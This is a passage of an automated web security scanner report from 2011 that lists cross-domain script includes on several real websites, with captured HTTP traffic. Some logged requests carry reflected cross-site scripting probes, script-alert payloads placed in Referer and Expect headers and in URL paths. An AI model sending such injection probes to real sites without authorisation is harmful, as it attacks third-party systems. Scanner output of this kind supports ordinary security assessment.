Set-Cookie: UA=AAAAAQAU_6tNyNa8Hrnbi_NeghM_H09Dd4ADA3gBY2BgYGJg6lzCwJLdysDI.4OB4YYrAwMDJwMDo76Q0wc_3HKvdgDVgYHvVNEGBi4GhvSnTLKMOoxAMQNGoKkM.dsYpYC8ZZ1M0ozqQIayG6MkkJrPwCgHpNJXMgoAKblOVjWgrAajJqMWkBs2Bywpv4uZjZmdkQMoAnUH2CYAEFEaNA--; Domain=.amgdgt.com; Expires=Sun, 01-May-2011 18:11:07 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 3813
Date: Fri, 01 Apr 2011 18:11:06 GMT

_289669_amg_acamp_id=166308;
_289669_amg_pcamp_id=69112;
_289669_amg_location_id=55365;
_289669_amg_creative_id=289669;
_289669_amg_loaded=true;
var _amg_289669_content='<script type="text/javascript"
...[SNIP]...
</script> <script src="http://servedby.adxpose.com/adxpose/find_ad.js" type="text/javascript" charset="utf-8"></script>\n'+
'\n'+
'<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253732017/direct/01/rnd=165539639?click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUyW30Qztm7SXZXbccXK3nvwjZkkdnZW8sdXNhLHQsMTMwMTY4MTQ2NzQ3MCxjLDI4OTY2OSxwYyw2OTExMixhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY1LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL0FBQUFBQUNBSUVBQUFBQUFBSUFnUUFBQUFFQXpNd3RBcEhBOUN0Y2pJMENrY0QwSzF5TWpRSmhtdmRXV2ZrRWZ2TnYyaTZnX0NqNDNGWlpOQUFBQUFPZ3VBQUMxQUFBQWxnSUFBQUlBQUFESHBBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFDd0ItZ0NrREdVQXVRNEJBZ1VDQUFRQUFBQUFqQnZGeUFBQUFBQS4vY25kPSFUQV9obXdqYzh3SVF4OGtLR0FBZzBjY0JLR1V4TXpNekVkY2pJMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllwQmxnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3d3dy5xdWlja3llbGxvdy5jb20vL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJPZF82TmhXV1RjRGFQSTcxbEFmaHZxV0lCTmZxLU5NQmw2R1U3Qmkzek9MY0hBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESkJvSUJGMk5oTFhCMVlpMDRPREkxT0RreE5UZ3lNakUxTURRMW9BSEQ4djNzQTdJQkUzZDNkeTV4ZFdsamEzbGxiR3h2ZHk1amIyMjZBUW96TURCNE1qVXdYMkZ6eUFFSjJnRWJhSFIwY0RvdkwzZDNkeTV4ZFdsamEzbGxiR3h2ZHk1amIyMHZtQUs2UU1BQ0JNZ0NoZExQQ3FnREFlZ0QtUUxvQTdrSTZBUGdLdWdEQV9VREFBQUF4SUFHNmNTRjlNV1Exb2t5Jm51bT0xJnNpZz1BR2lXcXR6WkFCQ1VQT1ZrdWsxb3lQMEtiRjh0cWtsOVNRJmNsaWVudD1jYS1wdWItODgyNTg5MTU4MjIxNTA0NSZhZHVybD0K/clkurl=">\n'+
'</script>
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=69112&c5=166308&c6=&cv=1.3&cj=1&rn=490539097" style="display:none" width="0" height="0" alt="" />\n'+
'\n'+
'<script type="text/javascript" src="http://view.c3metrics.com/v.js?id=adcon&cid=480&t=72"></script>
...[SNIP]...

12.2. http://cim.meebo.com/cim/init.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cim.meebo.com
Path:	/cim/init.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://s.meebocdn.net/cim/script/languages/language-en_v88_cim_9_4_6.js
http://s.meebocdn.net/cim/script/meebo_cim_v88_cim_9_4_6.js

Request

Response

12.3. http://dogpile.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dogpile.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/200/addthis_widget.js
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true

Request

Response

12.4. http://dogpile.com/dogpile/ws/index/qcat=yp/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dogpile.com
Path:	/dogpile/ws/index/qcat=yp/_iceUrlFlag=11

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/200/addthis_widget.js
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true

Request

Response

12.5. http://dogpile.com/dogpile/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dogpile.com
Path:	/dogpile/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11

Issue detail

The response dynamically includes the following scripts from other domains:

http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true

Request

Response

12.6. http://ecards.myfuncards.com/myfuncards/404 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ecards.myfuncards.com
Path:	/myfuncards/404

Issue detail

The response dynamically includes the following scripts from other domains:

http://ak.imgfarm.com/images/anx/anemone.js
http://dp.smileycentral.com/download/install_js.jhtml?v=3&product=myfuncards&partner=ZUxpr999&bInstantiateToolbar=false&bCustomFinishHandler=true
http://www.google-analytics.com/urchin.js
http://www.mywebface.com/toolbar/toolbar-v2.2-mws.js

Request

Response

HTTP/1.1 404 /myfuncards/404
Date: Fri, 01 Apr 2011 15:58:17 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8c DAV/2 mod_jk/1.2.28
Content-Language: en-US
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 84745


...[SNIP]...
</script>

<script type="text/javascript" src="http://www.mywebface.com/toolbar/toolbar-v2.2-mws.js"></script>

               <script type="text/javascript" src="http://dp.smileycentral.com/download/install_js.jhtml?v=3&product=myfuncards&partner=ZUxpr999&bInstantiateToolbar=false&bCustomFinishHandler=true"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ak.imgfarm.com/images/anx/anemone.js"></script>



       <script src='http://www.google-analytics.com/urchin.js' type='text/javascript'></script>
...[SNIP]...

12.7. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

http://ib.adnxs.com/ab?enc=pHA9CtcjI0CkcD0K1yMjQAAAAEAzMwtApHA9CtcjI0CkcD0K1yMjQJhmvdWWfkEfvNv2i6g_Cj43FZZNAAAAAOguAAC1AAAAlgIAAAIAAADHpAIA0WMAAAEAAABVU0QAVVNEACwB-gCkDGUAuQ4BAgUCAAQAAAAAPB_ZjAAAAAA.&tt_code=vert-377&udj=uf%28%27a%27%2C+9797%2C+1301681467%29%3Buf%28%27c%27%2C+47580%2C+1301681467%29%3Buf%28%27r%27%2C+173255%2C+1301681467%29%3Bppv%288991%2C+%272252220474958112408%27%2C+1301681467%2C+1301724667%2C+47580%2C+25553%29%3B&cnd=!TA_hmwjc8wIQx8kKGAAg0ccBKGUxMzMzEdcjI0BCCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYpBlgAGiWBQ..&referrer=http://www.quickyellow.com/&pp=TZYVNgAPLUAK5TqOQQlfYZle0E2L5OGhqjK3xg&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBOd_6NhWWTcDaPI71lAfhvqWIBNfq-NMBl6GU7Bi3zOLcHAAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi04ODI1ODkxNTgyMjE1MDQ1oAHD8v3sA7IBE3d3dy5xdWlja3llbGxvdy5jb226AQozMDB4MjUwX2FzyAEJ2gEbaHR0cDovL3d3dy5xdWlja3llbGxvdy5jb20vmAK6QMACBMgChdLPCqgDAegD-QLoA7kI6APgKugDA_UDAAAAxIAG6cSF9MWQ1oky%26num%3D1%26sig%3DAGiWqtzZABCUPOVkuk1oyP0KbF8tqkl9SQ%26client%3Dca-pub-8825891582215045%26adurl%3D

Request

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 01 Apr 2011 18:11:03 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
Content-Length: 1680
X-XSS-Protection: 1; mode=block

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&","&");viewReq.push(i);
...[SNIP]...
</script><script src="http://ib.adnxs.com/ab?enc=pHA9CtcjI0CkcD0K1yMjQAAAAEAzMwtApHA9CtcjI0CkcD0K1yMjQJhmvdWWfkEfvNv2i6g_Cj43FZZNAAAAAOguAAC1AAAAlgIAAAIAAADHpAIA0WMAAAEAAABVU0QAVVNEACwB-gCkDGUAuQ4BAgUCAAQAAAAAPB_ZjAAAAAA.&tt_code=vert-377&udj=uf%28%27a%27%2C+9797%2C+1301681467%29%3Buf%28%27c%27%2C+47580%2C+1301681467%29%3Buf%28%27r%27%2C+173255%2C+1301681467%29%3Bppv%288991%2C+%272252220474958112408%27%2C+1301681467%2C+1301724667%2C+47580%2C+25553%29%3B&cnd=!TA_hmwjc8wIQx8kKGAAg0ccBKGUxMzMzEdcjI0BCCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYpBlgAGiWBQ..&referrer=http://www.quickyellow.com/&pp=TZYVNgAPLUAK5TqOQQlfYZle0E2L5OGhqjK3xg&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBOd_6NhWWTcDaPI71lAfhvqWIBNfq-NMBl6GU7Bi3zOLcHAAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi04ODI1ODkxNTgyMjE1MDQ1oAHD8v3sA7IBE3d3dy5xdWlja3llbGxvdy5jb226AQozMDB4MjUwX2FzyAEJ2gEbaHR0cDovL3d3dy5xdWlja3llbGxvdy5jb20vmAK6QMACBMgChdLPCqgDAegD-QLoA7kI6APgKugDA_UDAAAAxIAG6cSF9MWQ1oky%26num%3D1%26sig%3DAGiWqtzZABCUPOVkuk1oyP0KbF8tqkl9SQ%26client%3Dca-pub-8825891582215045%26adurl%3D"></script>
...[SNIP]...

12.8. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/sma8.js

Request

Response

12.9. http://investor.infospaceinc.com/phoenix.zhtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://investor.infospaceinc.com
Path:	/phoenix.zhtml

Issue detail

The response dynamically includes the following scripts from other domains:

http://media.corporate-ir.net/media_files/irol/global_js/phoenix.js
http://phx.corporate-ir.net/HttpCombiner.ashx?s=RisenJS&v=2

Request

Response

12.10. http://manhattan.ny1.com/App_Skins/News1/Scripts/functions.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://manhattan.ny1.com
Path:	/App_Skins/News1/Scripts/functions.js

Issue detail

The response dynamically includes the following script from another domain:

http://0/

Request

GET /App_Skins/News1/Scripts/functions.js HTTP/1.1
Host: manhattan.ny1.com
Proxy-Connection: keep-alive
Referer: http://manhattan.ny1.com/content/top_stories/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=tsgnewsglobal1%2Ctsgny1%3D%2526pid%253D/favicon.ico%2526pidt%253D1%2526oid%253Dhttp%25253A//manhattan.ny1.com/content/top_stories/%2526ot%253DA

Response

HTTP/1.1 200 OK
Content-Length: 17137
Content-Type: application/x-javascript
Last-Modified: Fri, 10 Dec 2010 12:58:41 GMT
Accept-Ranges: bytes
ETag: "eef44ff86998cb1:4881"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 18:10:50 GMT
Connection: close

/*
ON MENU SELECTION.

To mark a link from the navigation as selected, either:

1. Apply to the link element a class="selected", or
2. Apply to the link an id="btn_sectionName", where sectionNam
...[SNIP]...

if (document.addEventListener) {
document.addEventListener("DOMContentLoaded", init, false);
}

/* for Internet Explorer */
/*@cc_on
@if (@_win32 && @_jscript_version > 5.5)
document.write("<script id=__ie_onload defer src=//0><\/scr"+"ipt>
...[SNIP]...

12.11. http://manhattan.ny1.com/Content/ServeContent.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://manhattan.ny1.com
Path:	/Content/ServeContent.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://twitter.com/javascripts/blogger.js
http://twitter.com/statuses/user_timeline/NYCASP.json?callback=twitterCallback2&count=1

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Length: 670
Cache-Control: no-cache, no-store, must-revalidate
Expires: Fri, 01 Apr 2011 18:10:56 GMT
Date: Fri, 01 Apr 2011 18:10:56 GMT
Connection: close

<div id="e16b7a6e-194a-4d94-acfc-dc7363e8d121"><style type="text/css">@import "/App_Skins/Global/Styles/iframeContent.css";</style><div id="twitter_div">
<center><h2 class="sidebar-title"><a href='ht
...[SNIP]...
</div>
<script type="text/javascript" src="http://twitter.com/javascripts/blogger.js"></script>
<script type="text/javascript" src="http://twitter.com/statuses/user_timeline/NYCASP.json?callback=twitterCallback2&count=1"></script>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=775632/size=300250/u=2/bnum=15423922/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=3/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ny1.com%252Ffavicon.ico%253F80003%2527-alert%25281%2529-%252746fe3f653ad%253D1

Issue detail

The response dynamically includes the following script from another domain:

http://redcated/TLC/jview/242390405/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000775632/mnum=0000956559/cstr=15423922=_4d961519,5531881864,775632^956559^1183^0,1_/xsxdata=$xsxdata/bnum=15423922/optn=64?trg=

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=775632/size=300250/u=2/bnum=75921501/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=3/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmanhattan.ny1.com%252Fcontent%252Ftop_stories%252F

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N3671.AOL/B5159652.30;sz=300x250;pc=[TPAS_ID];click=http://r1-ads.ace.advertising.com/click/site=0000775632/mnum=0000960768/cstr=75921501=_4d961536,0137232116,775632^960768^1183^0,1_/xsxdata=$xsxdata/bnum=75921501/optn=64?trg=;ord=0137232116?

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=775633/size=728090/u=2/bnum=34648487/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ny1.com%252Ffavicon.ico%253F80003%2527-alert%25281%2529-%252746fe3f653ad%253D1

Issue detail

The response dynamically includes the following script from another domain:

http://redcated/TLC/jview/253735207/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000775633/mnum=0000894875/cstr=34648487=_4d961513,5357117238,775633^894875^1183^0,1_/xsxdata=$xsxdata/bnum=34648487/optn=64?trg=

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=775633/size=728090/u=2/bnum=81095569/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmanhattan.ny1.com%252Fcontent%252Ftop_stories%252F

Issue detail

The response dynamically includes the following script from another domain:

http://redcated/TLC/jview/242390407/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000775633/mnum=0000956561/cstr=81095569=_4d96152d,0804225804,775633^956561^1183^0,1_/xsxdata=$xsxdata/bnum=81095569/optn=64?trg=

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=775634/size=160600/u=2/bnum=50393661/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=4/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmanhattan.ny1.com%252Fcontent%252Ftop_stories%252F

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N3671.AOL/B5229711.3;sz=160x600;pc=[TPAS_ID];click=http://r1-ads.ace.advertising.com/click/site=0000775634/mnum=0000973887/cstr=50393661=_4d961539,7387041562,775634^973887^1183^0,1_/xsxdata=$xsxdata/bnum=50393661/optn=64?trg=;ord=7387041562?

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=775634/size=160600/u=2/bnum=54361916/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=4/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ny1.com%252Ffavicon.ico%253F80003%2527-alert%25281%2529-%252746fe3f653ad%253D1

Issue detail

The response dynamically includes the following script from another domain:

http://redcated/TLC/jview/253735209/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000775634/mnum=0000894872/cstr=54361916=_4d96151b,5335516523,775634^894872^1183^0,1_/xsxdata=$xsxdata/bnum=54361916/optn=64?trg=

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=782463/size=160600/u=2/bnum=47025873/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=5/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmanhattan.ny1.com%252Fcontent%252Ftop_stories%252F

Issue detail

The response dynamically includes the following script from another domain:

http://redcated/00F/jview/273046185/direct;wi.160;hi.600/01?click=http://r1-ads.ace.advertising.com/click/site=0000782463/mnum=0000950857/cstr=47025873=_4d96153c,3635670272,782463^950857^1183^0,1_/xsxdata=$xsxdata/bnum=47025873/optn=64?trg=

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=782463/size=160600/u=2/bnum=70936362/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=5/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ny1.com%252Ffavicon.ico%253F80003%2527-alert%25281%2529-%252746fe3f653ad%253D1

Issue detail

The response dynamically includes the following script from another domain:

http://redcated/TLC/jview/242390404/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000782463/mnum=0000956558/cstr=70936362=_4d96151c,7111480630,782463^956558^1183^0,1_/xsxdata=$xsxdata/bnum=70936362/optn=64?trg=

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=782464/size=300250/u=2/bnum=21125090/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ny1.com%252Ffavicon.ico%253F80003%2527-alert%25281%2529-%252746fe3f653ad%253D1

Issue detail

The response dynamically includes the following script from another domain:

http://redcated/TLC/jview/253735206/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000782464/mnum=0000894873/cstr=21125090=_4d961516,2247225356,782464^894873^1183^0,1_/xsxdata=$xsxdata/bnum=21125090/optn=64?trg=

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=782464/size=300250/u=2/bnum=83041319/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmanhattan.ny1.com%252Fcontent%252Ftop_stories%252F

Issue detail

The response dynamically includes the following script from another domain:

http://redcated/00F/jview/249184162/direct;wi.300;hi.250/01?click=http://r1-ads.ace.advertising.com/click/site=0000782464/mnum=0000950887/cstr=83041319=_4d96152f,2174120635,782464^950887^1183^0,1_/xsxdata=$xsxdata/bnum=83041319/optn=64?trg=

Request

Response

12.22. http://s.aeriagames.com/misc/ads/error_banner_en.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s.aeriagames.com
Path:	/misc/ads/error_banner_en.html

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /misc/ads/error_banner_en.html HTTP/1.1
Host: s.aeriagames.com
Proxy-Connection: keep-alive
Referer: http://www.aeriagames.com/favicon.icof51ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E26b262688fc
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AGESESSID=253b9e3fed2c000be62f6ab117f20c43

Response

HTTP/1.1 200 OK
Content-Type: text/html
Accept-Ranges: bytes
ETag: "1087020324"
Last-Modified: Wed, 23 Feb 2011 14:27:43 GMT
Server: Aeria Games & Entertainment
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:17:16 GMT
Content-Length: 750
Connection: close

<!DOCTYPE HTML>
<html lang="en-us">
   <head>
       <meta http-equiv="Content-type" content="text/html; charset=utf-8" />
       <style type="text/css" media="screen"></style>
       <script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'></script>
...[SNIP]...

12.23. http://www.2theadvocate.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.2theadvocate.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

http://advocate.ftp.clickability.com/adv_weather/assets/js/jquery-ui.base.js
http://advocate.ftp.clickability.com/adv_weather/lightbox/js/lightbox.js
http://advocate.ftp.clickability.com/adv_weather/projects/registration/get-user.js
http://cas.clickability.com/cas/blank.js
http://img.video.ap.org/p/j/apovn.js

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.2theadvocate.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Server-Name: sj-c14-r2-u25
Content-Type: text/html;charset=utf-8
Date: Fri, 01 Apr 2011 16:44:16 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 53720

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Page not found | 2theadvocate.com</title>
   <script type="text/jav
...[SNIP]...
</script>
   <script type="text/javascript" src="http://advocate.ftp.clickability.com/adv_weather/assets/js/jquery-ui.base.js"></script>
...[SNIP]...
</script>

   <script type="text/javascript" src="http://img.video.ap.org/p/j/apovn.js "></script>
...[SNIP]...
</script>

   <script type="text/javascript" src="http://advocate.ftp.clickability.com/adv_weather/lightbox/js/lightbox.js"></script>
...[SNIP]...
</noscript>

   <script type="text/javascript" src="http://advocate.ftp.clickability.com/adv_weather/projects/registration/get-user.js"></script>
...[SNIP]...
<div id="LowIndex">


                                                   <script language="Javascript" type="text/javascript" src="http://cas.clickability.com/cas/blank.js"></script>
...[SNIP]...

12.24. http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.androidtapp.com
Path:	/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://partner.googleadservices.com/gampad/google_service.js
http://static.ak.connect.facebook.com/connect.php/en_US
http://track.netshelter.net/js/sites/androidtapp.com.js
http://twitter.com/javascripts/blogger.js
http://twitter.com/statuses/user_timeline/androidtapp.json?callback=twitterCallback2&count=5

Request

GET /favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cfd4e1e2237de0ee4f251e86b94bbc2a; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON; __gads=ID=b4b02331d89ff875:T=1301681709:S=ALNI_MYpSTRZveHosSTXFDXa1dTNOqCBCQ

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 18:15:15 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.9
Last-Modified: Fri, 01 Apr 2011 18:15:00 GMT
Vary: Accept-Encoding, Cookie
Expires: Fri, 01 Apr 2011 19:15:00 GMT
Pragma: public
Cache-Control: public, must-revalidate, proxy-revalidate
ETag: 40b5c018e83bde5a2be3f501c9a91f7d
Content-Type: text/html
Vary: User-Agent
Content-Length: 55378

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
</script> <script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'></script>
...[SNIP]...
<div
class="Section Ads"> <script type="text/javascript" src="http://static.ak.connect.facebook.com/connect.php/en_US"></script>
...[SNIP]...
</div> <script type="text/javascript" src="http://twitter.com/javascripts/blogger.js"></script> <script type="text/javascript" src="http://twitter.com/statuses/user_timeline/androidtapp.json?callback=twitterCallback2&count=5"></script>
...[SNIP]...
</script> <script type="text/javascript" src="http://track.netshelter.net/js/sites/androidtapp.com.js"></script>
...[SNIP]...
</script> <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

12.25. http://www.beatthetraffic.com/widgets/traveltimes.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beatthetraffic.com
Path:	/widgets/traveltimes.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://www.google.com/jsapi

Request

Response

12.26. http://www.cambridge.org/uk/catalogue/viewBasket.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cambridge.org
